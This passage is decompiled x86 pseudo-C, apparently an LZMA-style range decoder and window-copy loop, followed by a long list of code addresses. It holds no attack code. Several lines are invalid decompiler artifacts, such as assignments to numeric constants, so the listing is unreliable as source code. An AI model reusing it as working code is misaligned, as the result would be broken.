												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004065e3
0x004065e3
0x004065e7
0x00406608
0x0040660f
0x00406615
0x0040661b
0x0040662d
0x00406633
0x00406638
0x00000000
0x004065e9
0x004065ef
0x004069b0
0x004069b0
0x004069b0
0x004069b3
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00000000
0x00000000
0x00406a01
0x00406a05
0x00406bb4
0x00406bca
0x00406bd2
0x00406bd9
0x00406bdb
0x00406be2
0x00406be6
0x00406be6
0x00406a11
0x00406a18
0x00406a20
0x00406a23
0x00406a26
0x00406a26
0x00406a2c
0x00406a2c
0x004061c8
0x004061c8
0x004061c8
0x004061d1
0x00000000
0x00000000
0x004061d7
0x00000000
0x004061e2
0x00000000
0x00000000
0x004061eb
0x004061ee
0x004061f1
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fe
0x00406200
0x00406201
0x00406204
0x00406206
0x00406207
0x00406209
0x0040620c
0x00406211
0x00406216
0x0040621f
0x00406232
0x00406235
0x00406241
0x00406269
0x0040626b
0x00406279
0x00406279
0x0040627d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00406270
0x00406271
0x00406271
0x00000000
0x0040626d
0x00406247
0x0040624c
0x0040624c
0x00406255
0x0040625d
0x00406260
0x00000000
0x00406266
0x00406266
0x00000000
0x00406266
0x00000000
0x00406283
0x00406283
0x00406287
0x00406b33
0x00000000
0x00406b33
0x00406290
0x004062a0
0x004062a3
0x004062a6
0x004062a6
0x004062a6
0x004062a9
0x004062ad
0x00000000
0x00000000
0x004062af
0x004062b5
0x004062df
0x004062e5
0x004062ec
0x00000000
0x004062ec
0x004062bb
0x004062be
0x004062c3
0x004062c3
0x004062ce
0x004062d6
0x004062d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631e
0x00406324
0x00406327
0x00406334
0x0040633c
0x00000000
0x00000000
0x004062f3
0x004062f3
0x004062f7
0x00406b42
0x00000000
0x00406b42
0x00406303
0x0040630e
0x0040630e
0x0040630e
0x00406311
0x00406314
0x00406317
0x0040631c
0x00000000
0x00000000
0x00000000
0x00000000
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406344
0x00406346
0x00406349
0x004063ba
0x004063bd
0x004063c0
0x004063c7
0x004063d1
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x0040634b
0x0040634f
0x00406352
0x00406354
0x00406357
0x0040635a
0x0040635c
0x0040635f
0x00406361
0x00406366
0x00406369
0x0040636c
0x00406370
0x00406377
0x0040637a
0x00406381
0x00406385
0x0040638d
0x0040638d
0x0040638d
0x00406387
0x00406387
0x00406387
0x0040637c
0x0040637c
0x0040637c
0x00406391
0x00406394
0x004063b2
0x004063b4
0x00000000
0x00406396
0x00406396
0x00406399
0x0040639c
0x0040639f
0x004063a1
0x004063a1
0x004063a1
0x004063a4
0x004063a7
0x004063a9
0x004063aa
0x004063ad
0x00000000
0x004063ad
0x00000000
0x00000000
0x00000000
0x0040664d
0x00406651
0x00406674
0x00406677
0x0040667a
0x00406684
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665c
0x00406669
0x0040666c
0x0040666c
0x004069b0
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x00000000
0x00406690
0x00406694
0x00000000
0x00000000
0x0040669a
0x0040669e
0x00000000
0x00000000
0x004066a4
0x004066a6
0x004066aa
0x004066aa
0x004066ad
0x004066b1
0x00000000
0x00000000
0x00406701
0x00406705
0x0040670c
0x0040670f
0x00406712
0x0040671c
0x004069b0
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x004069b0
0x00406707
0x00000000
0x00000000
0x00406728
0x0040672c
0x00406733
0x00406736
0x00406739
0x0040672e
0x0040672e
0x0040672e
0x0040673c
0x0040673f
0x00406742
0x00406742
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674e
0x00406755
0x0040675a
0x00000000
0x00000000
0x004067e8
0x004067e8
0x004067ec
0x00406b8a
0x00000000
0x00406b8a
0x004067f2
0x004067f5
0x004067f8
0x004067fc
0x004067ff
0x00406805
0x00406807
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00000000
0x00000000
0x004063dd
0x004063dd
0x004063e1
0x00406b4e
0x00000000
0x00406b4e
0x004063e7
0x004063ea
0x004063ed
0x004063f1
0x004063f4
0x004063fa
0x004063fc
0x004063fc
0x004063fc
0x004063ff
0x00406402
0x00406402
0x00406405
0x00406408
0x00000000
0x00000000
0x0040640e
0x00406414
0x00000000
0x00000000
0x0040641a
0x0040641a
0x0040641e
0x00406421
0x00406424
0x00406427
0x0040642a
0x0040642b
0x0040642e
0x00406430
0x00406436
0x00406439
0x0040643c
0x0040643f
0x00406442
0x00406445
0x00406448
0x00406464
0x00406467
0x0040646a
0x0040646d
0x00406474
0x00406478
0x0040647a
0x0040647e
0x0040644a
0x0040644a
0x0040644e
0x00406456
0x0040645b
0x0040645d
0x0040645f
0x0040645f
0x00406481
0x00406488
0x0040648b
0x00000000
0x00406491
0x00000000
0x00406491
0x00000000
0x00406496
0x00406496
0x0040649a
0x00406b5a
0x00000000
0x00406b5a
0x004064a0
0x004064a3
0x004064a6
0x004064aa
0x004064ad
0x004064b3
0x004064b5
0x004064b5
0x004064b5
0x004064b8
0x004064bb
0x004064bb
0x004064bb
0x004064c1
0x00000000
0x00000000
0x004064c3
0x004064c6
0x004064c9
0x004064cc
0x004064cf
0x004064d2
0x004064d5
0x004064d8
0x004064db
0x004064de
0x004064e1
0x004064f9
0x004064fc
0x004064ff
0x00406502
0x00406502
0x00406505
0x00406509
0x0040650b
0x004064e3
0x004064e3
0x004064eb
0x004064f0
0x004064f2
0x004064f4
0x004064f4
0x0040650e
0x00406515
0x00406518
0x00000000
0x0040651a
0x00000000
0x0040651a
0x00406518
0x0040651f
0x0040651f
0x0040651f
0x0040651f
0x00000000
0x00000000
0x0040655a
0x0040655a
0x0040655e
0x00406b66
0x00000000
0x00406b66
0x00406564
0x00406567
0x0040656a
0x0040656e
0x00406571
0x00406577
0x00406579
0x00406579
0x00406579
0x0040657c
0x0040657f
0x0040657f
0x00406585
0x00406523
0x00406523
0x00406526
0x00000000
0x00406526
0x00406587
0x00406587
0x0040658a
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406599
0x0040659c
0x0040659f
0x004065a2
0x004065a5
0x004065bd
0x004065c0
0x004065c3
0x004065c6
0x004065c6
0x004065c9
0x004065cd
0x004065cf
0x004065a7
0x004065a7
0x004065af
0x004065b4
0x004065b6
0x004065b8
0x004065b8
0x004065d2
0x004065d9
0x004065dc
0x00000000
0x004065de
0x00000000
0x004065de
0x00000000
0x0040686b
0x0040686b
0x0040686f
0x00406b96
0x00000000
0x00406b96
0x00406875
0x00406878
0x0040687b
0x0040687f
0x00406882
0x00406888
0x0040688a
0x0040688a
0x0040688a
0x0040688d
0x00000000
0x00000000
0x0040663b
0x0040663b
0x0040663e
0x004069b0
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x00000000
0x0040697a
0x0040697e
0x004069a0
0x004069a3
0x004069ad
0x004069b0
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x004069b0
0x00406980
0x00406983
0x00406987
0x0040698a
0x0040698a
0x0040698d
0x00000000
0x00000000
0x00406a37
0x00406a3b
0x00406a59
0x00406a59
0x00406a59
0x00406a60
0x00406a67
0x00406a6e
0x00406a6e
0x00000000
0x00406a6e
0x00406a3d
0x00406a40
0x00406a43
0x00406a46
0x00406a4d
0x00406991
0x00406991
0x00406994
0x00000000
0x00000000
0x00406b28
0x00406b2b
0x00406a2c
0x00000000
0x00000000
0x00406762
0x00406764
0x0040676b
0x0040676c
0x0040676e
0x00406771
0x00000000
0x00000000
0x00406779
0x0040677c
0x0040677f
0x00406781
0x00406783
0x00406783
0x00406784
0x00406787
0x0040678e
0x00406791
0x0040679f
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00000000
0x00000000
0x00406a84
0x00406a84
0x00406a88
0x00406bc0
0x00000000
0x00406bc0
0x00406a8e
0x00406a91
0x00406a94
0x00406a98
0x00406a9b
0x00406aa1
0x00406aa3
0x00406aa3
0x00406aa3
0x00406aa6
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aac
0x00406aac
0x00406ab0
0x00406b10
0x00406b13
0x00406b18
0x00406b19
0x00406b1b
0x00406b1d
0x00406b20
0x00406a2c
0x00406a2c
0x00000000
0x00406a32
0x00406a2c
0x00406ab2
0x00406ab8
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406aca
0x00406acd
0x00406ad0
0x00406ad3
0x00406aec
0x00406aef
0x00406af2
0x00406af5
0x00406af9
0x00406afb
0x00406afb
0x00406afc
0x00406aff
0x00406ad5
0x00406ad5
0x00406add
0x00406ae2
0x00406ae4
0x00406ae7
0x00406ae7
0x00406b02
0x00406b09
0x00000000
0x00406b0b
0x00000000
0x00406b0b
0x00000000
0x004067a7
0x004067aa
0x004067e0
0x00406910
0x00406910
0x00406910
0x00406910
0x00406913
0x00406913
0x00406916
0x00406918
0x00406ba2
0x00000000
0x00406ba2
0x0040691e
0x00406921
0x00000000
0x00000000
0x00406927
0x0040692b
0x0040692e
0x0040692e
0x0040692e
0x00000000
0x0040692e
0x004067ac
0x004067ae
0x004067b0
0x004067b2
0x004067b5
0x004067b6
0x004067b8
0x004067ba
0x004067bd
0x004067c0
0x004067d6
0x004067db
0x00406813
0x00406813
0x00406817
0x00406843
